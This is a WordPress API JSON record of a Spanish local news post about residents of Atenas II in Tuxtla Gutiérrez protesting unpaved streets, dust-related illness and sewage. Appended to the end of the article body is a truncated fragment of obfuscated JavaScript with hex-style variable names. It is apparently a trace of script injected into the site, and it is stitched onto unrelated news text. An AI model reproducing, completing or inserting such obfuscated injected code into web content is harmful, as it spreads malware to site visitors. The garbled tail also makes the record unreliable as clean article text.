{"id":20164,"date":"2025-02-03T03:53:45","date_gmt":"2025-02-03T03:53:45","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=20164"},"modified":"2025-02-03T03:53:46","modified_gmt":"2025-02-03T03:53:46","slug":"denuncian-mal-estado-de-calles-en-atenas","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=20164","title":{"rendered":"Denuncian mal estado de calles en Atenas"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250202-WA0003-1024x576.jpg\" alt=\"\" class=\"wp-image-20165\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250202-WA0003-1024x576.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250202-WA0003-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250202-WA0003-768x432.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250202-WA0003-1536x864.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250202-WA0003.jpg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Manuel Jim\u00e9nez.<\/p>\n\n\n\n<p>2 de febrero del 2025. Tuxtla Guti\u00e9rrez. &#8211; Un grupo de habitantes del fraccionamiento Atenas II de Tuxtla Guti\u00e9rrez denunci\u00f3 riesgo por el p\u00e9simo estado en el que est\u00e1n sus calles y el colapso de drenaje en esta zona de la ciudad.<\/p>\n\n\n\n<p>En este fraccionamiento las calles est\u00e1n sin pavimentar se levanta una intensa polvareda cada vez que un veh\u00edculo circula por el lugar.<\/p>\n\n\n\n<p>&#8220;Han arreglado las vialidades aleda\u00f1as a nuestra colonia, pero no nos han tomado en cuenta para reparar las calles de su fraccionamiento&#8221;, manifestaron.<\/p>\n\n\n\n<p>Se\u00f1alaron que, el fraccionamiento Atenas II ha solicitado en m\u00faltiples ocasiones que se arreglen las calles. &#8220;Nuestro fraccionamiento es peque\u00f1o son nueve calles, de las cuales ocho est\u00e1n completamente da\u00f1adas\u201d, expuso el vocero Luis Enrique G\u00f3mez Trujillo y presidente del comit\u00e9 de participaci\u00f3n ciudadana de Atenas II.<\/p>\n\n\n\n<p>Otros vecinos se\u00f1alaron que m\u00e1s que los problemas materiales que puedan ocasionar a los veh\u00edculos por el p\u00e9simo estado de las calles, a \u00e9l le preocupa la salud de su familia por el polvo con el que lidian d\u00eda con d\u00eda<\/p>\n\n\n\n<p>\u201cTenemos problemas de salud por el polvo, la casa se limpia del diario, pero m\u00e1s de medio d\u00eda no pueden estar limpias por el polvo, hay alergias por el polvo, hay adultos mayores que ya por la edad no pueden estar inhalando polvo, no se puede salir a la calle, porque cuando pasan los carros meco dijeran ac\u00e1\u201d, puntualiz\u00f3.<\/p>\n\n\n\n<p>En este caso su esposa padece de alergias por el polvo y su hijo menor tambi\u00e9n se ha enfermado por esta situaci\u00f3n, la cual es un grave riesgo sanitario pues tambi\u00e9n hay encharcamientos de aguas negras lo que se vuelve otro foco de infecci\u00f3n.<\/p>\n\n\n\n<p>\u201cAhorita no se pueden mantener las ventanas abiertas porque se llena de polvo, m\u00e1s ahorita como est\u00e1 el clima y con el aire se pone feo&#8221;, lament\u00f3.<\/p>\n\n\n\n<p>Por ello, los vecinos lamentan que esta lamentable situaci\u00f3n debe ser atendida lo antes posible.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Manuel Jim\u00e9nez. 2 de febrero del 2025. Tuxtla Guti\u00e9rrez. &#8211; Un grupo de habitantes del fraccionamiento Atenas II de Tuxtla Guti\u00e9rrez denunci\u00f3 riesgo por el p\u00e9simo estado en el que est\u00e1n sus calles y el colapso de drenaje en esta zona de la ciudad. En este fraccionamiento las calles est\u00e1n sin pavimentar se levanta una &hellip;<\/p>\n","protected":false},"author":2,"featured_media":20165,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-20164","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20164","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=20164"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20164\/revisions"}],"predecessor-version":[{"id":20166,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20164\/revisions\/20166"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/20165"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=20164"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=20164"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=20164"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}